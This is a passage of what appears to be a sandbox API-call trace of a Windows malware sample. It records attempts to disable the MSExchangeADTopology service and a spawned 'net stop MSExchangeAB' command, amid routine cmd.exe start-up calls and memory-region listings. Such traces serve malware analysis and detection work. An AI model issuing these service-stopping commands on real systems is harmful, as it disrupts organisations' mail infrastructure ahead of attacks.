HeapInformationLength=0x0) returned 1 [0134.749] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0134.749] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0134.749] _wcsicmp (_String1="config", _String2="query") returned -14 [0134.749] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0134.749] _wcsicmp (_String1="config", _String2="start") returned -16 [0134.749] _wcsicmp (_String1="config", _String2="pause") returned -13 [0134.749] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0134.749] _wcsicmp (_String1="config", _String2="control") returned -14 [0134.749] _wcsicmp (_String1="config", _String2="continue") returned -14 [0134.749] _wcsicmp (_String1="config", _String2="stop") returned -16 [0134.749] _wcsicmp (_String1="config", _String2="config") returned 0 [0134.749] ResolveDelayLoadedAPI () returned 0x77262c10 [0134.749] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x328558 [0134.751] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0134.751] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0134.751] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0134.751] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0134.751] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0134.751] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0134.751] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0134.751] OpenServiceW (hSCManager=0x328558, lpServiceName="MSExchangeADTopology", dwDesiredAccess=0x3) returned 0x0 [0134.751] GetLastError () returned 0x424 [0134.751] _ultow (in: _Dest=0x424, _Radix=1440384 | out: _Dest=0x424) returned="1060" [0134.751] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0134.753] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x15fa5c, nSize=0x2, Arguments=0x15fa74 | out: lpBuffer="裨2煮\x15蔔è") returned 0x62 [0134.754] GetFileType (hFile=0x3c) returned 0x2 [0134.754] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x15fa40 | out: lpMode=0x15fa40) returned 1 [0134.754] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x3288e8*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x15fa50, lpReserved=0x0 | out: lpBuffer=0x3288e8*, lpNumberOfCharsWritten=0x15fa50*=0x62) returned 1 [0134.754] LocalFree (hMem=0x3288e8) returned 0x0 [0134.754] LocalFree (hMem=0x0) returned 0x0 [0134.754] CloseServiceHandle (hSCObject=0x328558) returned 1 [0134.755] LocalFree (hMem=0x0) returned 0x0 [0134.755] exit (_Code=1060) Thread: id = 585 os_tid = 0xca8 Process: id = "185" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x29366000" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeAB" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9480 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9481 start_va = 0x9c0000 end_va = 0x49bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 9482 start_va = 0x49c0000 end_va = 0x49dffff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 9483 start_va = 0x49e0000 end_va = 0x49e0fff entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 9484 start_va = 0x49f0000 end_va = 0x4a03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 9485 start_va = 0x4a10000 end_va = 0x4a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 9486 start_va = 0x4a50000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a50000" filename = "" Region: id = 9487 start_va = 0x4b50000 end_va = 0x4b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b50000" filename = "" Region: id = 9488 start_va = 0x4b60000 end_va = 0x4b60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 9489 start_va = 0x4b70000 end_va = 0x4b71fff entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 9490 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9491 start_va = 0x7f430000 end_va = 0x7f452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f430000" filename = "" Region: id = 9492 start_va = 0x7f454000 end_va = 0x7f454fff entry_point = 0x0 region_type = private name = "private_0x000000007f454000" filename = "" Region: id = 9493 start_va = 0x7f45a000 end_va = 0x7f45cfff entry_point = 0x0 region_type = private name = "private_0x000000007f45a000" filename = "" Region: id = 9494 start_va = 0x7f45d000 end_va = 0x7f45dfff entry_point = 0x0 region_type = private name = "private_0x000000007f45d000" filename = "" Region: id = 9495 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9496 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9497 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9498 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9499 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9500 start_va = 0x4c40000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 9501 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9502 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9503 start_va = 0x4df0000 end_va = 0x4eeffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 9504 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9545 start_va = 0x49c0000 end_va = 0x49cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049c0000" filename = "" Region: id = 9546 start_va = 0x4b80000 end_va = 0x4c3dfff entry_point = 0x4b80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9547 start_va = 0x4c50000 end_va = 0x4c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 9548 start_va = 0x4c90000 end_va = 0x4d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 9549 start_va = 0x5000000 end_va = 0x500ffff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 9550 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9551 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9552 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9553 start_va = 0x7f330000 end_va = 0x7f42ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f330000" filename = "" Region: id = 9554 start_va = 0x7f457000 end_va = 0x7f459fff entry_point = 0x0 region_type = private name = "private_0x000000007f457000" filename = "" Region: id = 9555 start_va = 0x49d0000 end_va = 0x49d3fff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 9556 start_va = 0x49e0000 end_va = 0x49e3fff entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 9557 start_va = 0x5010000 end_va = 0x5346fff entry_point = 0x5010000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 586 os_tid = 0x394 [0134.909] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0134.910] __set_app_type (_Type=0x1) [0134.910] __p__fmode () returned 0x77ac4d6c [0134.910] __p__commode () returned 0x77ac5b1c [0134.910] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0134.910] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0134.910] GetCurrentThreadId () returned 0x394 [0134.910] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x394) returned 0x84 [0134.910] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0134.910] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0134.910] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.912] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.912] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4b4fe18 | out: phkResult=0x4b4fe18*=0x0) returned 0x2 [0134.913] VirtualQuery (in: lpAddress=0x4b4fe1f, lpBuffer=0x4b4fdd0, dwLength=0x1c | out: lpBuffer=0x4b4fdd0*(BaseAddress=0x4b4f000, AllocationBase=0x4a50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.913] VirtualQuery (in: lpAddress=0x4a50000, lpBuffer=0x4b4fdd0, dwLength=0x1c | out: lpBuffer=0x4b4fdd0*(BaseAddress=0x4a50000, AllocationBase=0x4a50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.913] VirtualQuery (in: lpAddress=0x4a51000, lpBuffer=0x4b4fdd0, dwLength=0x1c | out: lpBuffer=0x4b4fdd0*(BaseAddress=0x4a51000, AllocationBase=0x4a50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.913] VirtualQuery (in: lpAddress=0x4a53000, lpBuffer=0x4b4fdd0, dwLength=0x1c | out: lpBuffer=0x4b4fdd0*(BaseAddress=0x4a53000, AllocationBase=0x4a50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.913] VirtualQuery (in: lpAddress=0x4b50000, lpBuffer=0x4b4fdd0, dwLength=0x1c | out: lpBuffer=0x4b4fdd0*(BaseAddress=0x4b50000, AllocationBase=0x4b50000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0134.913] GetConsoleOutputCP () returned 0x1b5 [0134.913] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.913] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0134.913] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.913] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0134.913] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.913] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0134.913] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.913] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0134.914] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.914] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0134.914] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.914] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0134.914] GetEnvironmentStringsW () returned 0x4df7d60* [0134.914] FreeEnvironmentStringsA (penv="A") returned 1 [0134.914] GetEnvironmentStringsW () returned 0x4df7d60* [0134.914] FreeEnvironmentStringsA (penv="A") returned 1 [0134.914] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4b4ed7c | out: phkResult=0x4b4ed7c*=0x94) returned 0x0 [0134.914] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x0, lpData=0x4b4ed88*=0x28, lpcbData=0x4b4ed84*=0x1000) returned 0x2 [0134.914] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x4, lpData=0x4b4ed88*=0x1, lpcbData=0x4b4ed84*=0x4) returned 0x0 [0134.914] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x0, lpData=0x4b4ed88*=0x1, lpcbData=0x4b4ed84*=0x1000) returned 0x2 [0134.914] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x4, lpData=0x4b4ed88*=0x0, lpcbData=0x4b4ed84*=0x4) returned 0x0 [0134.914] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x4, lpData=0x4b4ed88*=0x40, lpcbData=0x4b4ed84*=0x4) returned 0x0 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x4, lpData=0x4b4ed88*=0x40, lpcbData=0x4b4ed84*=0x4) returned 0x0 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x0, lpData=0x4b4ed88*=0x40, lpcbData=0x4b4ed84*=0x1000) returned 0x2 [0134.915] RegCloseKey (hKey=0x94) returned 0x0 [0134.915] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4b4ed7c | out: phkResult=0x4b4ed7c*=0x94) returned 0x0 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x0, lpData=0x4b4ed88*=0x40, lpcbData=0x4b4ed84*=0x1000) returned 0x2 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x4, lpData=0x4b4ed88*=0x1, lpcbData=0x4b4ed84*=0x4) returned 0x0 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x0, lpData=0x4b4ed88*=0x1, lpcbData=0x4b4ed84*=0x1000) returned 0x2 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x4, lpData=0x4b4ed88*=0x0, lpcbData=0x4b4ed84*=0x4) returned 0x0 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x4, lpData=0x4b4ed88*=0x9, lpcbData=0x4b4ed84*=0x4) returned 0x0 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x4, lpData=0x4b4ed88*=0x9, lpcbData=0x4b4ed84*=0x4) returned 0x0 [0134.915] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4b4ed80, lpData=0x4b4ed88, lpcbData=0x4b4ed84*=0x1000 | out: lpType=0x4b4ed80*=0x0, lpData=0x4b4ed88*=0x9, lpcbData=0x4b4ed84*=0x1000) returned 0x2 [0134.915] RegCloseKey (hKey=0x94) returned 0x0 [0134.915] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29837 [0134.915] srand (_Seed=0x5ad29837) [0134.915] GetCommandLineW () returned="/c net stop MSExchangeAB" [0134.915] GetCommandLineW () returned="/c net stop MSExchangeAB" [0134.915] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.915] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4df9cb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0134.915] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0134.915] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.915] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.915] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.915] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.915] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.915] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.915] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.915] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.915] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.915] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.915] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.916] GetEnvironmentStringsW () returned 0x4df7d60* [0134.916] FreeEnvironmentStringsA (penv="A") returned 1 [0134.916] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.916] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.916] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.916] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.916] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.916] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.916] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.916] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.916] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.916] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.916] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b4fb54 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.916] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4b4fb54, lpFilePart=0x4b4fb4c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4b4fb4c*="Desktop") returned 0x1d [0134.916] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0134.916] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4b4f8d0 | out: lpFindFileData=0x4b4f8d0) returned 0x4df05c8 [0134.916] FindClose (in: hFindFile=0x4df05c8 | out: hFindFile=0x4df05c8) returned 1 [0134.916] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4b4f8d0 | out: lpFindFileData=0x4b4f8d0) returned 0x4df05c8 [0134.916] FindClose (in: hFindFile=0x4df05c8 | out: hFindFile=0x4df05c8) returned 1 [0134.917] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0134.917] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4b4f8d0 | out: lpFindFileData=0x4b4f8d0) returned 0x4df05c8 [0134.917] FindClose (in: hFindFile=0x4df05c8 | out: hFindFile=0x4df05c8) returned 1 [0134.917] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0134.917] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0134.917] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0134.917] GetEnvironmentStringsW () returned 0x4df7d60* [0134.917] FreeEnvironmentStringsA (penv="=") returned 1 [0134.917] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0134.917] GetConsoleOutputCP () returned 0x1b5 [0134.918] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.918] GetUserDefaultLCID () returned 0x409 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4b4fc84, cchData=128 | out: lpLCData="0") returned 2 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4b4fc84, cchData=128 | out: lpLCData="0") returned 2 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4b4fc84, cchData=128 | out: lpLCData="1") returned 2 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0134.918] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0134.918] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.919] GetConsoleTitleW (in: lpConsoleTitle=0x4dfa9e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0134.919] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0134.919] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0134.919] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0134.920] _wcsicmp (_String1="net", _String2=")") returned 69 [0134.920] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0134.920] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0134.920] _wcsicmp (_String1="IF", _String2="net") returned -5 [0134.920] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0134.920] _wcsicmp (_String1="REM", _String2="net") returned 4 [0134.920] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0134.920] GetConsoleTitleW (in: lpConsoleTitle=0x4b4f970, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.921] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0134.921] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0134.921] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0134.921] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0134.921] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0134.921] _wcsicmp (_String1="net", _String2="CD") returned 11 [0134.921] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0134.921] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0134.921] _wcsicmp (_String1="net", _String2="REN") returned -4 [0134.921] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0134.921] _wcsicmp (_String1="net", _String2="SET") returned -5 [0134.921] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0134.921] _wcsicmp (_String1="net", 